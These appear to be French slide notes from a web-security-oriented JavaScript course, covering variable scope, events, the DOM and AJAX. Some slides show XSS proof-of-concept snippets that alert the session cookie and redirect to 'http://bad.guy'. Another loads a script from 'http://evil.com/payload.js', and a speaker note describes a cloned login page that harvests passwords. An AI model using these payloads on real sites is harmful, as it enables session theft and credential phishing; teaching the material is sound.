# javascript

## aka ECMAScript


## Javascript

* 95 netscape livescript
* interpréteur js propre au navigateur
  * ie s'arrête de charger la page en cas d'erreur
  * ff ou chrome essaient de continuer l'exécution
* sensible à la casse
* asynchrone


## Javascript

* var contexte
  * var dans le sciprt accessible partout y compris dans les fonctionns
  * var dans les fonctions scope restreint à la fonction
  * sans le var on déclare forcément global
    * y compris dans une variable

Note:
- on peut avoir du js dans un pdf (adobe reader a donc un interpréteur js)
- Google a mis le pied sur l'accélérateur avec la sortie de chrome
    - ca ve de mieuix en mieux en terme de comatibilité cross browser


## Les événements

* déclenchement de traitements
  * interaction utilisateur

* événements de là page


## Les événements

* onload
  * quand tous les éléments sont chargés
    * il est alors possible de modifier les contenus

* onunload
  * quand on quitte le navigateur
    * abandonner car trop intrusif


## Les événements

* onerror
  * en cas d'échec
    * chargement d'image ou d'iframe par exemple

* onsubmit
  * quand un formulaire est soumis
    * changer l'url d'un formulaire à la volée


## Le DOM

[<i class="fa fa-book" aria-hidden="true"></i> document](https://developer.mozilla.org/en-US/docs/Web/API/Document)

* Document Object Model
    * document.referer (SEO)
* id unique getElementById
    * renvoie un résultat
* getElementsByTagname
    * renvoie un tableau d'elements
    * la page en cours est le contexte
        * history.back() c'est un autre contexte
        * frame ...


## Le DOM

* document.cookie
    * values = document.cookie.split(';')
    * "userid=maze;expires=friday 29 sept"
* souvent utilisé pour exploiter les XSS
    * changer le contenu de la page
    * rediriger la page
    * changer l'url d'un formulaire


## vrac

[<i class="fa fa-book" aria-hidden="true"></i> window](https://developer.mozilla.org/en-US/docs/Web/API/Window) représente l'environement du navigateurs

```js
window.alert('PoC')
```

```js
console.log('plus silencieux car visible avec la console only')
```

```js
alert(document.cookie); // affiche le contenu du cookie de session en pop up
window.location = "http://bad.guy"; // redirige vers http://bad.guy
```

Note:
- redirection sur une  page identique
    - maitrisée par nous qui renvoie au serveur oriignal après avoir récup le login / mot de passe


## inclusion

dans le corps de la page

```js
<script>alert('Poc');</script>
```

dans un fichier externe

```js
<script src="http://evil.com/payload.js"></script>
```

directement dans les événements associés à un élément du DOM

```js
<a onclick="javascipt:alert('clicked');">peacefull link</a>
<img onload="javascript:console.log('quieter');" />
```


## AJAX / XMLHTTPRequest

* associé au web 2.0 (2006)
* existe depuis le début HTTP 1.0 (1989)
  * google map éléments de la carte chargés et rafraichis au déplacement
* permet un appel asynchrone d'url
  * sans recharger la page
  * le résultat reçu est utilisable par js

[<i class="fa fa-github"></i> un gist exemple](https://gist.github.com/nealrs/28dbfe2c74dfdde26a30)


[<i class="fa fa-book"></i> pour le reste tout est accessible à partir d'ici](http://edu.muetton.me/)
